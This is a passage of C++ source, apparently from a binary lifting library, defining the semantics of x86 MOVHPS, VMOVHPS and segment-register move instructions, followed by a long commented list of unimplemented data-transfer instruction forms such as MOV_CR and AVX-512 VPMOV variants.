FClearV32(FReadV32(dst)); auto src_vec = FReadV32(src); auto low_entry = FExtractV32(src_vec, 2); auto high_entry = FExtractV32(src_vec, 3); FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 0, low_entry), 1, high_entry)); return memory; } #if HAS_FEATURE_AVX DEF_SEM(VMOVHPS, VV256W dst, V128 src1, MV64 src2) { auto dst_vec = FReadV32(src1); auto src_vec = FReadV32(src2); auto low_entry = FExtractV32(src_vec, 0); auto high_entry = FExtractV32(src_vec, 1); FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 2, low_entry), 3, high_entry)); return memory; } #endif // HAS_FEATURE_AVX } // namespace DEF_ISEL(MOVHPS_XMMq_MEMq) = MOVHPS; DEF_ISEL(MOVHPS_MEMq_XMMps) = MOVHPS_STORE; IF_AVX(DEF_ISEL(VMOVHPS_XMMdq_XMMq_MEMq) = VMOVHPS;) IF_AVX(DEF_ISEL(VMOVHPS_MEMq_XMMdq) = MOVHPS_STORE;) //5197 VMOVHPS VMOVHPS_XMMf32_XMMf32_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2 //5198 VMOVHPS VMOVHPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2 namespace { template <typename T> DEF_SEM(MOV_ES, R16W dst, T src) { Write(dst, Read(src)); return __remill_sync_hyper_call(state, memory, SyncHyperCall::kX86SetSegmentES); } template <typename T> DEF_SEM(MOV_SS, R16W dst, T src) { Write(dst, Read(src)); return __remill_sync_hyper_call(state, memory, SyncHyperCall::kX86SetSegmentSS); } template <typename T> DEF_SEM(MOV_DS, R16W dst, T src) { Write(dst, Read(src)); return __remill_sync_hyper_call(state, memory, SyncHyperCall::kX86SetSegmentDS); } template <typename T> DEF_SEM(MOV_FS, R16W dst, T src) { Write(dst, Read(src)); return __remill_sync_hyper_call(state, memory, SyncHyperCall::kX86SetSegmentFS); } template <typename T> DEF_SEM(MOV_GS, R16W dst, T src) { Write(dst, Read(src)); return __remill_sync_hyper_call(state, memory, SyncHyperCall::kX86SetSegmentGS); } } // namespace DEF_ISEL(MOV_MEMw_SEG) = MOV<M16W, R16>; DEF_ISEL(MOV_GPRv_SEG_16) = MOV<R16W, R16>; DEF_ISEL(MOV_GPRv_SEG_32) = MOV<R32W, R16>; IF_64BIT(DEF_ISEL(MOV_GPRv_SEG_64) = MOV<R64W, R16>;) DEF_ISEL(MOV_SEG_MEMw_ES) = MOV_ES<M16>; DEF_ISEL(MOV_SEG_MEMw_SS) = MOV_SS<M16>; DEF_ISEL(MOV_SEG_MEMw_DS) = MOV_DS<M16>; DEF_ISEL(MOV_SEG_MEMw_FS) = MOV_FS<M16>; DEF_ISEL(MOV_SEG_MEMw_GS) = MOV_GS<M16>; DEF_ISEL(MOV_SEG_GPR16_ES) = MOV_ES<R16>; DEF_ISEL(MOV_SEG_GPR16_SS) = MOV_SS<R16>; DEF_ISEL(MOV_SEG_GPR16_DS) = MOV_DS<R16>; DEF_ISEL(MOV_SEG_GPR16_FS) = MOV_FS<R16>; DEF_ISEL(MOV_SEG_GPR16_GS) = MOV_GS<R16>; /* 25 MOV_DR MOV_DR_DR_GPR32 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0 26 MOV_DR MOV_DR_DR_GPR64 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0 27 MOV_DR MOV_DR_GPR32_DR DATAXFER BASE I86 ATTRIBUTES: RING0 28 MOV_DR MOV_DR_GPR64_DR DATAXFER BASE I86 ATTRIBUTES: RING0 1312 MASKMOVDQU MASKMOVDQU_XMMdq_XMMdq DATAXFER SSE2 SSE2 ATTRIBUTES: FIXED_BASE0 MASKOP NOTSX 545 MOVMSKPS MOVMSKPS_GPR32_XMMps DATAXFER SSE SSE ATTRIBUTES: 585 MOVSHDUP MOVSHDUP_XMMps_MEMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT 586 MOVSHDUP MOVSHDUP_XMMps_XMMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT 647 MOVLHPS MOVLHPS_XMMq_XMMq DATAXFER SSE SSE ATTRIBUTES: 648 MOVQ2DQ MOVQ2DQ_XMMdq_MMXq DATAXFER SSE2 SSE2 ATTRIBUTES: MMX_EXCEPT NOTSX 689 MOV_CR MOV_CR_CR_GPR32 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0 690 MOV_CR MOV_CR_CR_GPR64 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0 691 MOV_CR MOV_CR_GPR32_CR DATAXFER BASE I86 ATTRIBUTES: RING0 692 MOV_CR MOV_CR_GPR64_CR DATAXFER BASE I86 ATTRIBUTES: RING0 957 MOVSLDUP MOVSLDUP_XMMps_MEMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT 958 MOVSLDUP MOVSLDUP_XMMps_XMMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT 1071 MOVBE MOVBE_GPRv_MEMv DATAXFER MOVBE MOVBE ATTRIBUTES: SCALABLE 1072 MOVBE MOVBE_MEMv_GPRv DATAXFER MOVBE MOVBE ATTRIBUTES: SCALABLE 1484 MOVDQ2Q MOVDQ2Q_MMXq_XMMq DATAXFER SSE2 SSE2 ATTRIBUTES: MMX_EXCEPT NOTSX 1495 MOVMSKPD MOVMSKPD_GPR32_XMMpd DATAXFER SSE2 SSE2 ATTRIBUTES: 1829 MASKMOVQ MASKMOVQ_MMXq_MMXq DATAXFER MMX PENTIUMMMX ATTRIBUTES: FIXED_BASE0 MASKOP NOTSX 1839 MOVHLPS MOVHLPS_XMMq_XMMq DATAXFER SSE SSE ATTRIBUTES: 1880 MOVDDUP MOVDDUP_XMMdq_MEMq DATAXFER SSE3 SSE3 ATTRIBUTES: UNALIGNED 1881 MOVDDUP MOVDDUP_XMMdq_XMMq DATAXFER SSE3 SSE3 ATTRIBUTES: UNALIGNED 1882 BSWAP BSWAP_GPRv DATAXFER BASE I486REAL ATTRIBUTES: SCALABLE 2101 VMOVMSKPD VMOVMSKPD_GPR32d_XMMdq DATAXFER AVX AVX ATTRIBUTES: 2102 VMOVMSKPD VMOVMSKPD_GPR32d_YMMqq DATAXFER AVX AVX ATTRIBUTES: 2107 VMOVMSKPS VMOVMSKPS_GPR32d_XMMdq DATAXFER AVX AVX ATTRIBUTES: 2108 VMOVMSKPS VMOVMSKPS_GPR32d_YMMqq DATAXFER AVX AVX ATTRIBUTES: 2202 VMOVSHDUP VMOVSHDUP_XMMdq_MEMdq DATAXFER AVX AVX ATTRIBUTES: 2203 VMOVSHDUP VMOVSHDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES: 2204 VMOVSHDUP VMOVSHDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES: 2205 VMOVSHDUP VMOVSHDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES: 2281 VMOVDDUP VMOVDDUP_XMMdq_MEMq DATAXFER AVX AVX ATTRIBUTES: 2282 VMOVDDUP VMOVDDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES: 2283 VMOVDDUP VMOVDDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES: 2284 VMOVDDUP VMOVDDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES: 2464 VMOVSLDUP VMOVSLDUP_XMMdq_MEMdq DATAXFER AVX AVX ATTRIBUTES: 2465 VMOVSLDUP VMOVSLDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES: 2466 VMOVSLDUP VMOVSLDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES: 2467 VMOVSLDUP VMOVSLDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES: 2619 VMOVLHPS VMOVLHPS_XMMdq_XMMq_XMMq DATAXFER AVX AVX ATTRIBUTES: 3395 VMOVHLPS VMOVHLPS_XMMdq_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES: 3804 VPMOVDB VPMOVDB_XMMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3805 VPMOVDB VPMOVDB_MEMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3806 VPMOVDB VPMOVDB_XMMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3807 VPMOVDB VPMOVDB_MEMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3808 VPMOVDB VPMOVDB_XMMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3809 VPMOVDB VPMOVDB_MEMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3814 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3815 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3816 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3817 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3818 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3819 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3826 VPMOVDW VPMOVDW_YMMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3827 VPMOVDW VPMOVDW_MEMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3828 VPMOVDW VPMOVDW_XMMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3829 VPMOVDW VPMOVDW_MEMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3830 VPMOVDW VPMOVDW_XMMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3831 VPMOVDW VPMOVDW_MEMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3853 VMOVSHDUP VMOVSHDUP_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3854 VMOVSHDUP VMOVSHDUP_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 3855 VMOVSHDUP VMOVSHDUP_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3856 VMOVSHDUP VMOVSHDUP_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 3857 VMOVSHDUP VMOVSHDUP_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3858 VMOVSHDUP VMOVSHDUP_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 3861 VPMOVSDW VPMOVSDW_YMMi16_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3862 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3863 VPMOVSDW VPMOVSDW_XMMi16_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3864 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3865 VPMOVSDW VPMOVSDW_XMMi16_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3866 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3897 VPMOVZXWQ VPMOVZXWQ_ZMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3898 VPMOVZXWQ VPMOVZXWQ_ZMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3899 VPMOVZXWQ VPMOVZXWQ_XMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3900 VPMOVZXWQ VPMOVZXWQ_XMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3901 VPMOVZXWQ VPMOVZXWQ_YMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3902 VPMOVZXWQ VPMOVZXWQ_YMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3937 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3938 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3939 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3940 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3941 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3942 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3962 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3963 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3964 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3965 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3966 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3967 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3968 VPMOVUSQD VPMOVUSQD_YMMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3969 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3970 VPMOVUSQD VPMOVUSQD_XMMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3971 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3972 VPMOVUSQD VPMOVUSQD_XMMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3973 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3980 VPMOVSXDQ VPMOVSXDQ_ZMMi64_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3981 VPMOVSXDQ VPMOVSXDQ_ZMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3982 VPMOVSXDQ VPMOVSXDQ_XMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3983 VPMOVSXDQ VPMOVSXDQ_XMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3984 VPMOVSXDQ VPMOVSXDQ_YMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3985 VPMOVSXDQ VPMOVSXDQ_YMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4027 VMOVDDUP VMOVDDUP_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4028 VMOVDDUP VMOVDDUP_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX 4029 VMOVDDUP VMOVDDUP_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4030 VMOVDDUP VMOVDDUP_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX 4031 VMOVDDUP VMOVDDUP_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4032 VMOVDDUP VMOVDDUP_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX 4045 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4046 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4047 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4048 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4049 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4050 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4051 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4052 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4053 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4054 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4055 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4056 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4242 VPMOVD2M VPMOVD2M_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES: 4243 VPMOVD2M VPMOVD2M_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES: 4244 VPMOVD2M VPMOVD2M_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES: 4260 VPMOVSXBQ VPMOVSXBQ_ZMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4261 VPMOVSXBQ VPMOVSXBQ_ZMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4262 VPMOVSXBQ VPMOVSXBQ_XMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4263 VPMOVSXBQ VPMOVSXBQ_XMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4264 VPMOVSXBQ VPMOVSXBQ_YMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4265 VPMOVSXBQ VPMOVSXBQ_YMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4284 VPMOVZXBD VPMOVZXBD_ZMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4285 VPMOVZXBD VPMOVZXBD_ZMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4286 VPMOVZXBD VPMOVZXBD_XMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4287 VPMOVZXBD VPMOVZXBD_XMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4288 VPMOVZXBD VPMOVZXBD_YMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4289 VPMOVZXBD VPMOVZXBD_YMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4314 VPMOVB2M VPMOVB2M_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: 4315 VPMOVB2M VPMOVB2M_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: 4316 VPMOVB2M VPMOVB2M_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: 4356 VMOVSLDUP VMOVSLDUP_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4357 VMOVSLDUP VMOVSLDUP_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 4358 VMOVSLDUP VMOVSLDUP_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4359 VMOVSLDUP VMOVSLDUP_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 4360 VMOVSLDUP VMOVSLDUP_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4361 VMOVSLDUP VMOVSLDUP_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 4375 VPMOVSXBW VPMOVSXBW_XMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 4376 VPMOVSXBW VPMOVSXBW_XMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4377 VPMOVSXBW VPMOVSXBW_YMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 4378 VPMOVSXBW VPMOVSXBW_YMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4379 VPMOVSXBW VPMOVSXBW_ZMMi16_MASKmskw_YMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 4380 VPMOVSXBW VPMOVSXBW_ZMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM 